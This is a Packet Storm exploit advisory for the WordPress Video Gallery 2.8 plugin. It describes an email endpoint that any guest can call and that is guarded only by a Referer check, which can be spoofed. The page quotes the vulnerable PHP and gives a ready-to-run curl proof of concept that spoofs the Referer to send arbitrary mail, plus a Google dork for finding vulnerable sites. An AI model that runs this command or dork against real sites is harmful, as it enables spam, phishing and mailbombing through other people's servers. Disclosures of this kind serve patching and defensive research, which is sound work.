ignore security and it'll go away

WordPress Video Gallery 2.8 Unprotected Mail Page

WordPress Video Gallery 2.8 Unprotected Mail Page
Posted May 22, 2015
Authored by Claudio Viviani

WordPress Video Gallery plugin version 2.8 fails to protect email functionality allowing it to be leveraged for spam.

tags | exploit
MD5 | 277642e645191461c5d88c0fc4c98316

WordPress Video Gallery 2.8 Unprotected Mail Page

Change Mirror Download
######################

# Exploit Title : Wordpress Video Gallery 2.8 Unprotected Mail Page

# Exploit Author : Claudio Viviani

# Website Author: http://www.homelab.it
http://archive-exploit.homelab.it/1 (Full HomelabIT Vulns Archive)

# Vendor Homepage : http://www.apptha.com/category/extension/Wordpress/Video-Gallery

# Software Link : https://downloads.wordpress.org/plugin/contus-video-gallery.2.8.zip

# Dork Google: index of "contus-video-gallery"


# Date : 2015-04-05

# Tested on : Windows 7 / Mozilla Firefox
Linux / Mozilla Firefox

######################

# Description

Wordpress Video Gallery 2.8 suffers from Unprotected Mail Page.

This vulnerability is exploitable to dos, phishing, mailbombing, spam...

The "email" ajax action is callable from any guest visitor (/contus-video-gallery/hdflvvideoshare.php)

/**
* Email function
*/
add_action( 'wp_ajax_email', 'email_function' );
add_action( 'wp_ajax_nopriv_email', 'email_function' );

function email_function() {
require_once( dirname( __FILE__ ) . '/email.php' );
die();
}

Any user can send email from /contus-video-gallery/email.php to any recipients.

The variables used to send emails are:

$to = filter_input( INPUT_POST, 'to', FILTER_VALIDATE_EMAIL );
$from = filter_input( INPUT_POST, 'from', FILTER_VALIDATE_EMAIL );
$url = filter_input( INPUT_POST, 'url', FILTER_VALIDATE_URL );
$subject = filter_input( INPUT_POST, 'Note', FILTER_SANITIZE_STRING );
$message_content = filter_input( INPUT_POST, 'Note', FILTER_SANITIZE_STRING );
$title = filter_input( INPUT_POST, 'title', FILTER_SANITIZE_STRING );
$referrer = parse_url( $_SERVER['HTTP_REFERER'] );
$referrer_host = $referrer['scheme'] . '://' . $referrer['host'];
$pageURL = 'http';

It assumes that if the provided “Referrer” field fits the website’s URL, then it’s okay to send this email:

if ( $referrer_host === $pageURL ) {
$headers = "MIME-Version: 1.0" . "\r\n";
$headers .= "Content-type:text/html;charset=UTF-8" . "\r\n";
$headers .= "From: " . "<" . $from . ">\r\n";
$headers .= "Reply-To: " . $from . "\r\n";
$headers .= "Return-path: " . $from;
$username = explode('@' , $from );
$username = ucfirst($username['0']);
$subject = $username . ' has shared a video with you.';
$emailtemplate_path = plugin_dir_url( __FILE__ ).'front/emailtemplate/Emailtemplate.html';
$message = file_get_contents( $emailtemplate_path);
$message = str_replace( '{subject}', $subject, $message );
$message = str_replace( '{message}', $message_content, $message);
$message = str_replace( '{videourl}',$url,$message );
$message = str_replace('{username}',$username ,$message );
if ( @mail( $to, $title, $message, $headers ) ) {
echo 'success=sent';
} else {
echo 'success=error';
}
} else {
echo 'success=error';
}

The “Referer” field can easily be modified by the attacker!

######################

# PoC

curl -X POST -d "from=attacker@attacker.com&to=victim@victim.com&Note=BodyMessage&title=Subject&url=http://www.homelab.it" \
-e http://127.0.0.1 http://127.0.0.1/wp-admin/admin-ajax.php?action=email

cUrl switch "-e" spoof referer address

# Http Response

success=sent

# Poc Video

http://youtu.be/qgOGPm1-tNc


#######################

Discovered By : Claudio Viviani
http://www.homelab.it
http://archive-exploit.homelab.it/1 (Full HomelabIT Archive Exploit)
http://ffhd.homelab.it (Free Fuzzy Hashes Database)

info@homelab.it
homelabit@protonmail.ch

https://www.facebook.com/homelabit
https://twitter.com/homelabit
https://plus.google.com/+HomelabIt1/
https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww

#####################

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

October 2017

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Oct 1st
    15 Files
  • 2
    Oct 2nd
    16 Files
  • 3
    Oct 3rd
    15 Files
  • 4
    Oct 4th
    15 Files
  • 5
    Oct 5th
    11 Files
  • 6
    Oct 6th
    6 Files
  • 7
    Oct 7th
    2 Files
  • 8
    Oct 8th
    1 Files
  • 9
    Oct 9th
    13 Files
  • 10
    Oct 10th
    16 Files
  • 11
    Oct 11th
    15 Files
  • 12
    Oct 12th
    23 Files
  • 13
    Oct 13th
    13 Files
  • 14
    Oct 14th
    12 Files
  • 15
    Oct 15th
    2 Files
  • 16
    Oct 16th
    16 Files
  • 17
    Oct 17th
    16 Files
  • 18
    Oct 18th
    15 Files
  • 19
    Oct 19th
    10 Files
  • 20
    Oct 20th
    7 Files
  • 21
    Oct 21st
    4 Files
  • 22
    Oct 22nd
    0 Files
  • 23
    Oct 23rd
    0 Files
  • 24
    Oct 24th
    0 Files
  • 25
    Oct 25th
    0 Files
  • 26
    Oct 26th
    0 Files
  • 27
    Oct 27th
    0 Files
  • 28
    Oct 28th
    0 Files
  • 29
    Oct 29th
    0 Files
  • 30
    Oct 30th
    0 Files
  • 31
    Oct 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2016 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close